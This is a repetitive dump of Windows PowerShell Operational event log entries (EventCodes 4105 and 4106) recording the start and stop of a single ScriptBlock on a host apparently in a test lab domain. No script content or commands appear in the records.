Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472378
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472377
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472376
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472375
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472374
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472373
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472372
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472371
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472370
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472369
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472368
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472367
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472366
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472365
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472364
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472363
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472362
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472361
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472360
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472359
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472358
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472357
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472356
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472355
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472354
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472353
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472352
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472351
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472350
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472349
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472348
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472347
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472346
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472345
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472344
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472343
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472342
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472341
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472340
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472339
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472338
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472337
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472336
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472335
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472334
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472333
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472332
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472331
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472330
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472329
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472328
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472327
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472326
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472325
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
